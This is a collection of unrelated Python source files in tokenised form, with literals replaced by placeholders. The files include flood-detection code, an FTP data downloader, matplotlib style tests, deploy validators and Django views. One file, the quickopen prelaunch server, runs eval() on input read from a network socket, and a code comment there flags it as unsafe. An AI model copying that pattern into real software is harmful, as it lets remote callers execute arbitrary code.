'<STR_LIT>' ) , <EOL> DNNS_DIFF : ( '<STR_LIT>' , dnns_diff , True , '<STR_LIT>' ) , <EOL> DNNS_REVISED : ( '<STR_LIT>' , dnns_revised , False , '<STR_LIT>' ) , <EOL> DNNS_DEM : ( '<STR_LIT>' , dnns_dem , False , '<STR_LIT>' ) , <EOL> DNNS_DIFF_DEM : ( '<STR_LIT>' , dnns_diff_dem , False , '<STR_LIT>' ) , <EOL> DIFFERENCE_HISTORY : ( '<STR_LIT>' , history_diff , False , '<STR_LIT>' ) , <EOL> DEM_THRESHOLD : ( '<STR_LIT>' , dem_threshold , False , '<STR_LIT>' ) , <EOL> MARTINIS_TREE : ( '<STR_LIT>' , martinis_tree , False , '<STR_LIT>' ) , <EOL> ADABOOST : ( '<STR_LIT>' , adaboost , False , '<STR_LIT>' ) , <EOL> ADABOOST_LEARNED : ( '<STR_LIT>' , adaboost_learn , False , '<STR_LIT>' ) , <EOL> ADABOOST_DEM : ( '<STR_LIT>' , adaboost_dem , False , '<STR_LIT>' ) , <EOL> ACTIVE_CONTOUR : ( '<STR_LIT>' , <EOL> cmt . radar . active_contour . active_countour_skybox , False , '<STR_LIT>' ) , <EOL> } <EOL> def detect_flood ( domain , algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> approach = _ALGORITHMS [ algorithm ] <EOL> except : <EOL> return None <EOL> return ( approach [ <NUM_LIT:0> ] , approach [ <NUM_LIT:1> ] ( domain , compute_modis_indices ( domain ) ) ) <EOL> def get_algorithm_name ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:0> ] <EOL> except : <EOL> return None <EOL> def get_algorithm_color ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:3> ] <EOL> except : <EOL> return None <EOL> def is_algorithm_fractional ( algorithm ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> return _ALGORITHMS [ algorithm ] [ <NUM_LIT:2> ] <EOL> except : <EOL> return None </s>
<s> """<STR_LIT>""" <EOL> from ftplib import FTP <EOL> from datetime import datetime , timedelta <EOL> import tempfile <EOL> import subprocess <EOL> import datasets <EOL> import dbio <EOL> import re <EOL> table = "<STR_LIT>" <EOL> def dates ( dbname ) : <EOL> dts = datasets . dates ( dbname , table ) <EOL> return dts <EOL> def download ( dbname , dts , bbox ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" <EOL> ftp = FTP ( url ) <EOL> ftp . login ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ftp . cwd ( "<STR_LIT>" ) <EOL> outpath = tempfile . mkdtemp ( ) <EOL> for dt in [ dts [ <NUM_LIT:0> ] + timedelta ( t ) for t in range ( ( dts [ <NUM_LIT:1> ] - dts [ <NUM_LIT:0> ] ) . days + <NUM_LIT:1> ) ] : <EOL> try : <EOL> ftp . cwd ( "<STR_LIT>" . format ( dt . year , dt . month ) ) <EOL> filenames = [ f for f in ftp . nlst ( ) if re . match ( r"<STR_LIT>" . format ( dt . strftime ( "<STR_LIT>" ) ) , f ) is not None ] <EOL> if len ( filenames ) > <NUM_LIT:0> : <EOL> fname = filenames [ <NUM_LIT:0> ] <EOL> with open ( "<STR_LIT>" . format ( outpath , fname ) , '<STR_LIT:wb>' ) as f : <EOL> ftp . retrbinary ( "<STR_LIT>" . format ( fname ) , f . write ) <EOL> with open ( "<STR_LIT>" . format ( outpath , fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) , '<STR_LIT:wb>' ) as f : <EOL> ftp . retrbinary ( "<STR_LIT>" . format ( fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) ) , f . write ) <EOL> tfname = fname . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> fname = datasets . uncompress ( fname , outpath ) <EOL> datasets . uncompress ( tfname , outpath ) <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath , fname ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> if bbox is not None : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( bbox [ <NUM_LIT:0> ] ) , "<STR_LIT>" . format ( bbox [ <NUM_LIT:3> ] ) , "<STR_LIT>" . format ( bbox [ <NUM_LIT:2> ] ) , "<STR_LIT>" . 
format ( bbox [ <NUM_LIT:1> ] ) , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> else : <EOL> subprocess . call ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) ] ) <EOL> cmd = "<STR_LIT:U+0020>" . join ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" . format ( outpath ) , "<STR_LIT>" ] ) <EOL> subprocess . call ( cmd , shell = True ) <EOL> dbio . ingest ( dbname , "<STR_LIT>" . format ( outpath ) , dt , table , False ) <EOL> except : <EOL> print ( "<STR_LIT>" . format ( table , dt . strftime ( "<STR_LIT>" ) ) ) </s>
<s> """<STR_LIT>""" <EOL> ebTemplate = """<STR_LIT>""" <EOL> wbTemplate = """<STR_LIT>""" <EOL> surTemplate = """<STR_LIT>""" <EOL> subTemplate = """<STR_LIT>""" <EOL> evaTemplate = """<STR_LIT>""" <EOL> cspTemplate = """<STR_LIT>""" <EOL> def template ( varlist ) : <EOL> """<STR_LIT>""" <EOL> out = "<STR_LIT>" . format ( len ( varlist ) ) <EOL> out += "<STR_LIT:\n>" <EOL> if "<STR_LIT>" in varlist : <EOL> out += ebTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += cspTemplate <EOL> if "<STR_LIT:wb>" in varlist : <EOL> out += wbTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += surTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += subTemplate <EOL> if "<STR_LIT>" in varlist : <EOL> out += evaTemplate <EOL> return out <EOL> def variableGroup ( args ) : <EOL> """<STR_LIT>""" <EOL> groupvars = { '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> '<STR_LIT:wb>' : [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] } <EOL> for v in args : <EOL> if v in groupvars : <EOL> args . remove ( v ) <EOL> for gv in groupvars [ v ] : <EOL> if gv not in args : <EOL> args . append ( gv ) <EOL> return args </s>
<s> "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> import unittest <EOL> import matplotlib as mpl <EOL> import matplotlib . axes <EOL> import matplotlib . figure <EOL> import matplotlib . patches <EOL> from mplStyle import MplSubStyle <EOL> class TestMplSubStyle ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkElement ( self , testName , values , element ) : <EOL> for property in values : <EOL> expected = values [ property ] <EOL> msg = "<STR_LIT>" % ( testName , property ) <EOL> getFunc = getattr ( element , '<STR_LIT>' % property ) <EOL> self . assertEqual ( expected , getFunc ( ) , msg = msg ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> figVals = { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } <EOL> axVals = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> } <EOL> patchVals = { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> fig = mpl . figure . Figure ( ) <EOL> ax = mpl . axes . Axes ( fig , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> element = mpl . patches . 
Patch ( ) <EOL> style = MplSubStyle ( <EOL> figure = { <EOL> '<STR_LIT:width>' : figVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : figVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : figVals [ '<STR_LIT>' ] , <EOL> } , <EOL> axes = { <EOL> '<STR_LIT>' : axVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : axVals [ '<STR_LIT>' ] , <EOL> } , <EOL> patch = { <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : patchVals [ '<STR_LIT>' ] , <EOL> } <EOL> ) <EOL> style . apply ( fig ) <EOL> self . checkElement ( "<STR_LIT>" , figVals , fig ) <EOL> style . apply ( ax ) <EOL> self . checkElement ( "<STR_LIT>" , axVals , ax ) <EOL> style . apply ( element ) <EOL> self . checkElement ( "<STR_LIT>" , patchVals , element ) <EOL> self . assertRaises ( Exception , style . apply , '<STR_LIT>' , <EOL> msg = "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> __version__ = "<STR_LIT>" <EOL> def toListOf ( value , converter , allowOne = False , allowNone = False , name = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if value is None and allowNone : <EOL> return None <EOL> if name : <EOL> name = "<STR_LIT>" % name <EOL> if isinstance ( value , tuple ) : <EOL> valueList = list ( value ) <EOL> elif isinstance ( value , list ) : <EOL> valueList = value <EOL> elif allowOne : <EOL> valueList = [ value ] <EOL> else : <EOL> msg = "<STR_LIT>" "<STR_LIT>" % ( name , value ) <EOL> raise Exception ( msg ) <EOL> results = [ ] <EOL> try : <EOL> for v in valueList : <EOL> results . append ( converter ( v ) ) <EOL> except Exception , e : <EOL> msg = "<STR_LIT>" % ( e , name ) <EOL> raise Exception ( msg ) <EOL> return results </s>
<s> "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> import unittest <EOL> import mplStyle as S <EOL> class MyStyle ( S . types . Style ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , kw = { } , parent = None , custom = None ) : <EOL> self . figure = S . types . Data ( <EOL> text = S . types . Data ( <EOL> size = None , <EOL> color = None , <EOL> ) , <EOL> bgColor = None , <EOL> fgColor = None , <EOL> ) <EOL> self . axes = S . types . Data ( <EOL> text = S . types . Data ( <EOL> size = None , <EOL> color = None , <EOL> ) , <EOL> bgColor = None , <EOL> fgColor = None , <EOL> ) <EOL> S . types . Style . __init__ ( self , name , kw , parent , custom ) <EOL> def __str__ ( self ) : <EOL> s = "<STR_LIT>" % self . name <EOL> s += "<STR_LIT>" % self . figure <EOL> s += "<STR_LIT>" % self . axes <EOL> return s <EOL> def copy ( self , newName ) : <EOL> style = MyStyle ( newName , { } , self . parent , self . custom ) <EOL> style . figure = self . figure . copy ( deep = True ) <EOL> style . axes = self . axes . copy ( deep = True ) <EOL> return style <EOL> def update ( self , style ) : <EOL> super ( MyStyle , self ) . update ( style ) <EOL> if style . figure . text . size is not None : <EOL> self . figure . text . size = style . figure . text . size <EOL> if style . figure . text . color is not None : <EOL> self . figure . text . color = style . figure . text . color <EOL> if style . figure . bgColor is not None : <EOL> self . figure . bgColor = style . figure . bgColor <EOL> if style . figure . fgColor is not None : <EOL> self . figure . fgColor = style . figure . fgColor <EOL> if style . axes . text . size is not None : <EOL> self . axes . text . size = style . axes . text . size <EOL> if style . axes . text . color is not None : <EOL> self . axes . text . color = style . axes . text . color <EOL> if style . axes . bgColor is not None : <EOL> self . axes . bgColor = style . axes . bgColor <EOL> if style . axes . fgColor is not None : <EOL> self . axes . 
fgColor = style . axes . fgColor <EOL> def _applyStyle ( self , obj , filter , postProcess ) : <EOL> process , recurse = filter ( obj ) <EOL> if not process : <EOL> return <EOL> if self . figure . text . size is not None : <EOL> obj . figureTextSize = self . figure . text . size <EOL> if self . figure . text . color is not None : <EOL> obj . figureTextColor = self . figure . text . color <EOL> if self . figure . bgColor is not None : <EOL> obj . figureBgColor = self . figure . bgColor <EOL> if self . figure . fgColor is not None : <EOL> obj . figureFgColor = self . figure . fgColor <EOL> if self . axes . text . size is not None : <EOL> obj . axesTextSize = self . axes . text . size <EOL> if self . axes . text . color is not None : <EOL> obj . axesTextColor = self . axes . text . color <EOL> if self . axes . bgColor is not None : <EOL> obj . axesBgColor = self . axes . bgColor <EOL> if self . axes . fgColor is not None : <EOL> obj . axesFgColor = self . axes . fgColor <EOL> postProcess ( obj ) <EOL> class TestStyle ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def checkObj ( self , name , obj , style ) : <EOL> """<STR_LIT>""" <EOL> attrs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for key in attrs : <EOL> desired = style . getValue ( '<STR_LIT>' % attrs [ key ] ) <EOL> actual = getattr ( obj , '<STR_LIT>' % key ) <EOL> msg = "<STR_LIT>" % ( name , key ) <EOL> self . assertEqual ( desired , actual , msg = msg ) <EOL> desired = style . getValue ( '<STR_LIT>' % attrs [ key ] ) <EOL> actual = getattr ( obj , '<STR_LIT>' % key ) <EOL> msg = "<STR_LIT>" % ( name , key ) <EOL> self . 
assertEqual ( desired , actual , msg = msg ) <EOL> def checkDataEq ( self , name , desired , actual ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( desired , S . types . Data ) and isinstance ( actual , S . types . Data ) : <EOL> self . assertEqual ( desired . keys ( ) , actual . keys ( ) , <EOL> msg = "<STR_LIT>" % ( name , ) ) <EOL> for key in desired : <EOL> self . checkDataEq ( '<STR_LIT>' % ( name , key ) , desired [ key ] , actual [ key ] ) <EOL> else : <EOL> self . assertEqual ( desired , actual , <EOL> msg = "<STR_LIT>" % ( name , ) ) <EOL> def checkStyleEq ( self , name , desired , actual ) : <EOL> """<STR_LIT>""" <EOL> self . checkDataEq ( '<STR_LIT>' % name , desired . figure , actual . figure ) <EOL> self . checkDataEq ( '<STR_LIT>' % name , desired . axes , actual . axes ) <EOL> def testBasic ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> style2 = MyStyle ( '<STR_LIT>' ) <EOL> style2 . figure . bgColor = '<STR_LIT>' <EOL> style2 . axes . bgColor = '<STR_LIT>' <EOL> style3 = MyStyle ( '<STR_LIT>' , parent = style1 ) <EOL> style3 . figure . text . size = <NUM_LIT> <EOL> style4 = MyStyle ( '<STR_LIT>' ) <EOL> style4 . figure . text . size = <NUM_LIT> <EOL> style4 . axes . text . size = <NUM_LIT:8> <EOL> style4 . figure . bgColor = '<STR_LIT>' <EOL> style4 . axes . bgColor = '<STR_LIT>' <EOL> style5 = MyStyle ( '<STR_LIT>' ) <EOL> style5 . figure . text . size = <NUM_LIT> <EOL> style5 . figure . bgColor = '<STR_LIT>' <EOL> style5 . axes . bgColor = '<STR_LIT>' <EOL> style6 = MyStyle ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> style7 = MyStyle ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : style1 , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( "<STR_LIT>" , style1 . 
name , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:12> , style1 . figure . text . size , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT> , style3 . figure . text . size , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:12> , style1 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT> , style3 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( None , style3 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:8> , style3 . getResolvedValue ( '<STR_LIT>' ) , msg = msg ) <EOL> newStyle = style3 . resolve ( '<STR_LIT>' , style2 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style4 , newStyle ) <EOL> newStyle = style3 . copy ( '<STR_LIT>' ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style3 , newStyle ) <EOL> newStyle . update ( style2 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , newStyle ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , style6 ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style3 , style7 ) <EOL> def customFunc ( obj ) : <EOL> obj . figureBgColor = '<STR_LIT>' <EOL> obj . axesBgColor = '<STR_LIT>' <EOL> style3 . custom = customFunc <EOL> obj = S . types . Data ( <EOL> figureTextSize = None , <EOL> figureTextColor = None , <EOL> figureBgColor = None , <EOL> figureFgColor = None , <EOL> axesTextSize = None , <EOL> axesTextColor = None , <EOL> axesBgColor = None , <EOL> axesFgColor = None , <EOL> ) <EOL> style3 . apply ( obj ) <EOL> self . checkObj ( '<STR_LIT>' , obj , style4 ) <EOL> self . assertEqual ( False , style3 . canApply ( obj ) , msg = "<STR_LIT>" ) <EOL> style1 . setValue ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> msg = "<STR_LIT>" <EOL> self . assertEqual ( <NUM_LIT:10> , style1 . getValue ( '<STR_LIT>' ) , msg = msg ) <EOL> newStyle = MyStyle . resolveStyles ( None , style1 ) <EOL> self . 
checkStyleEq ( '<STR_LIT>' , style1 , newStyle ) <EOL> newStyle = MyStyle . resolveStyles ( None , [ style2 , style3 ] ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style4 , newStyle ) <EOL> def testMultiParents ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . figure . text . color = '<STR_LIT>' <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> style1 . axes . text . color = '<STR_LIT>' <EOL> style2 = MyStyle ( '<STR_LIT>' ) <EOL> style2 . figure . bgColor = '<STR_LIT>' <EOL> style2 . axes . bgColor = '<STR_LIT>' <EOL> style2 . axes . text . color = '<STR_LIT>' <EOL> style3 = MyStyle ( '<STR_LIT>' , parent = style1 ) <EOL> style3 . figure . text . size = <NUM_LIT> <EOL> style3 . figure . fgColor = '<STR_LIT>' <EOL> style4 = MyStyle ( '<STR_LIT>' , parent = [ style3 , style2 ] ) <EOL> style4 . figure . fgColor = '<STR_LIT>' <EOL> style4 . axes . fgColor = '<STR_LIT>' <EOL> style5 = MyStyle ( '<STR_LIT>' ) <EOL> style5 . figure . text . size = <NUM_LIT> <EOL> style5 . figure . text . color = '<STR_LIT>' <EOL> style5 . figure . bgColor = '<STR_LIT>' <EOL> style5 . figure . fgColor = '<STR_LIT>' <EOL> style5 . axes . text . size = <NUM_LIT:8> <EOL> style5 . axes . text . color = '<STR_LIT>' <EOL> style5 . axes . bgColor = '<STR_LIT>' <EOL> style5 . axes . fgColor = '<STR_LIT>' <EOL> newStyle = style4 . resolve ( '<STR_LIT>' ) <EOL> self . checkStyleEq ( '<STR_LIT>' , style5 , newStyle ) <EOL> def testErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> style1 = MyStyle ( '<STR_LIT>' ) <EOL> style1 . figure . text . size = <NUM_LIT:12> <EOL> style1 . axes . text . size = <NUM_LIT:8> <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . getValue , '<STR_LIT>' , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . getValue , '<STR_LIT>' , msg = msg ) <EOL> msg = "<STR_LIT>" <EOL> self . assertRaises ( Exception , style1 . 
setValue , '<STR_LIT>' , '<STR_LIT>' , msg = msg ) </s>
import sys

from tiget.git import init_repo, GitError
from tiget.utils import print_error, post_mortem
from tiget.plugins import load_plugin


def main():
    """Load the core plugin and initialise the git repository,
    exiting with status 1 on any failure."""
    load_plugin('<STR_LIT>')
    try:
        init_repo()
    except GitError as err:
        # Known git-level failure: report it and bail out.
        print_error(err)
        sys.exit(1)
    except Exception:
        # Anything unexpected: drop into the post-mortem handler first.
        post_mortem()
        sys.exit(1)
def get():
    """Return the module's constant value.

    NOTE(review): the numeric literal and the original docstring were
    elided by tokenisation; confirm the intended constant upstream.
    """
    return <NUM_LIT>
import os
import socket
import sys
import httplib
import time
import StringIO

from db_status import DBStatus
from trace_event import *

# Module-level flag: set once wait_for_command() has taken over this process.
_is_prelaunched_process = False


def is_prelaunched_process():
    # True when this process was started ahead of time and is serving
    # (or waiting for) a command on the control port.
    return _is_prelaunched_process


def wait_for_command(control_port):
    """Block until one command arrives on *control_port*, run it through
    quickopen.main(), send the captured stdout back to the client, then
    exit the process.

    Never returns: finishes with sys.exit(0).
    """
    global _is_prelaunched_process
    _is_prelaunched_process = True
    s = socket.socket()
    try:
        trace_begin("<STR_LIT>")
        # Retry the bind for ~1s: the previous owner of the port may not
        # have released it yet.
        bound = False
        for i in range(<NUM_LIT:10>):
            try:
                s.bind(("<STR_LIT>", control_port))
                bound = True
                break
            except socket.error:
                time.sleep(<NUM_LIT:0.1>)
        if not bound:
            raise Exception("<STR_LIT>")
        trace_end("<STR_LIT>")
        # Accept exactly one client connection.
        s.listen(<NUM_LIT:1>)
        trace_begin("<STR_LIT>")
        c, a = s.accept()
        trace_end("<STR_LIT>")
        f = c.makefile()
        trace_begin("<STR_LIT>")
        # SECURITY NOTE(review): eval() on a line read straight from the
        # socket executes attacker-controlled input; the empty globals/
        # locals dicts do NOT sandbox it.  Consider ast.literal_eval if
        # the protocol only ever sends a literal argument list.
        args = eval(f.readline(), {}, {})
        trace_end("<STR_LIT>")
        import quickopen
        import optparse
        # Capture everything the command prints so it can be shipped
        # back to the client verbatim.
        old_stdout = sys.stdout
        new_stdout = StringIO.StringIO()
        sys.stdout = new_stdout
        old_argv = sys.argv
        try:
            # Run quickopen as if it had been invoked with these argv.
            sys.argv = [sys.argv[<NUM_LIT:0>]]
            sys.argv.extend(args)
            parser = optparse.OptionParser(usage=quickopen.main_usage())
            quickopen.main(parser)
        except:
            # Restore stdout before printing the traceback so the error
            # is visible on the real console, not the capture buffer.
            sys.stdout = old_stdout
            import traceback
            traceback.print_exc()
        finally:
            sys.argv = old_argv
            sys.stdout = old_stdout
        trace_end("<STR_LIT>")
        # Send the captured output back, repr-encoded on a single line.
        v = new_stdout.getvalue()
        f.write(repr(v))
        f.write("<STR_LIT:\n>")
        f.close()
    finally:
        s.close()
    sys.exit(<NUM_LIT:0>)
import os
import re

import yaml
from fabric.colors import green, red, yellow

# Path of the generated deploy file in the current working directory.
DEPLOY_YAML = os.path.join(os.getcwd(), '<STR_LIT>')


def _create_deploy_yaml(site):
    """Serialise *site* to DEPLOY_YAML and report progress."""
    _green("<STR_LIT>")
    _write_file(DEPLOY_YAML, yaml.safe_dump(site, default_flow_style=False))
    _green("<STR_LIT>" % DEPLOY_YAML)


def _validate_django_settings(django_settings):
    """Validate a dotted Django settings module path; the matching
    .py file must exist relative to the working directory."""
    django_settings_regex = r"<STR_LIT>"
    pattern = re.compile(django_settings_regex)
    if not pattern.match(django_settings):
        raise ValueError(red("<STR_LIT>"))
    django_settings_path = django_settings.replace('.', '/') + '<STR_LIT>'
    if not os.path.exists(django_settings_path):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    return django_settings


def _validate_project_name(project_name):
    """Validate the project name and require its directory to exist."""
    project_name_regex = r"<STR_LIT>"
    pattern = re.compile(project_name_regex)
    if not pattern.match(project_name):
        raise ValueError(red("<STR_LIT>"))
    if not os.path.exists(os.path.join(os.getcwd(), project_name)):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    return project_name


def _validate_requirements(requirements):
    """Validate the requirements-file path and require it to exist."""
    if not requirements.endswith("<STR_LIT>"):
        raise ValueError(red("<STR_LIT>"))
    if not os.path.exists(os.path.join(os.getcwd(), requirements)):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    return requirements


def _validate_managepy(managepy):
    """Validate the manage.py path and require the file to exist."""
    managepy_regex = r"<STR_LIT>"
    pattern = re.compile(managepy_regex)
    if not pattern.match(managepy):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    if not os.path.exists(os.path.join(os.getcwd(), managepy)):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    return managepy


def _validate_admin_password(admin_password):
    """Validate the admin password against the configured pattern."""
    password_regex = r"<STR_LIT>"
    pattern = re.compile(password_regex)
    if not pattern.match(admin_password):
        raise ValueError(red(
            "<STR_LIT>"
            "<STR_LIT>"
        ))
    return admin_password


def _validate_providers(provider):
    """Require *provider* to be one of the supported hosting providers."""
    providers = ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']
    if provider not in providers:
        raise ValueError(red(
            "<STR_LIT>"
            "%s" % providers
        ))
    return provider


def _write_file(path, contents):
    """Write *contents* to *path*.

    BUG FIX: uses a ``with`` block so the handle is closed even on
    error (the original left it open and shadowed the ``file`` builtin).
    """
    with open(path, 'w') as fh:
        fh.write(contents)


def _read_file(path):
    """Return the full contents of *path* (handle closed promptly)."""
    with open(path, 'r') as fh:
        contents = fh.read()
    return contents


def _join(*args):
    """Thin wrapper around os.path.join."""
    return os.path.join(*args)


# Coloured print helpers.  Written as print(...) with a single argument,
# which behaves identically under Python 2 and 3.
def _green(text):
    print(green(text))


def _red(text):
    print(red(text))


def _yellow(text):
    print(yellow(text))
from django.db import models
from django.contrib.auth.models import User

from Project import Project


class AuthorRequest(models.Model):
    """A user's pending request to be listed as an author of a project."""

    class Meta:
        app_label = '<STR_LIT>'

    user = models.ForeignKey(User)
    project = models.ForeignKey(Project)
    # Presumably True when the request was generated automatically rather
    # than submitted by the user — confirm against the creating code.
    autodetected = models.BooleanField(default=False)

    def approve(self):
        # Grant authorship, persist the project, then discard the request.
        self.project.authors.add(self.user)
        self.project.save()
        self.delete()

    def reject(self):
        # Discard the request without granting anything.
        self.delete()
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect, Http404
from django.template import RequestContext
from django.shortcuts import render_to_response, get_object_or_404
from dashboard.models import *
from dashboard.util import force_url_paths, avoid_duplicate_queries
from lib.InheritanceQuerySet import InheritanceQuerySet
from observatory.dashboard.views import commits, blogs
from django.db import connection

# Maximum number of events shown on the feed page.
INDEX_EVENT_COUNT = <NUM_LIT:100>


def feed(request):
    # Fetch the newest events (with subclass data) for the index feed.
    qs = InheritanceQuerySet(model=Event)
    objs = qs.select_subclasses().order_by('<STR_LIT:date>').reverse()[:INDEX_EVENT_COUNT]
    # Pre-seed the author cache with the requesting user to avoid
    # redundant per-event queries.
    avoid_duplicate_queries(objs, "<STR_LIT>", "<STR_LIT>",
                            author={request.user.id: request.user}
                            if request.user.is_authenticated() else {})
    return render_to_response('<STR_LIT>', {
        '<STR_LIT>': objs,
        '<STR_LIT>': True
    }, context_instance=RequestContext(request))


def event(request, url_path):
    # Canonicalise the URL path first; a redirect response means the
    # client should retry at the canonical location.
    resp = force_url_paths(event, url_path)
    if resp:
        return resp
    try:
        qs = InheritanceQuerySet(model=Event)
        the_event = qs.select_subclasses().get(url_path=url_path)
    # NOTE(review): bare except hides all errors (not just DoesNotExist)
    # behind a 404 — consider narrowing to the model's lookup exceptions.
    except:
        raise Http404
    # Redirect to the type-specific view for the event.
    if the_event.__class__ is Commit:
        return HttpResponseRedirect(reverse(commits.show,
                                            args=(the_event.project.url_path,
                                                  the_event.url_path,)))
    else:
        if the_event.project is not None:
            return HttpResponseRedirect(reverse(blogs.show_post,
                                                args=(the_event.project.url_path,
                                                      the_event.url_path,)))
        else:
            return HttpResponseRedirect(reverse(blogs.show_user_post,
                                                args=(the_event.author.id,
                                                      the_event.url_path,)))
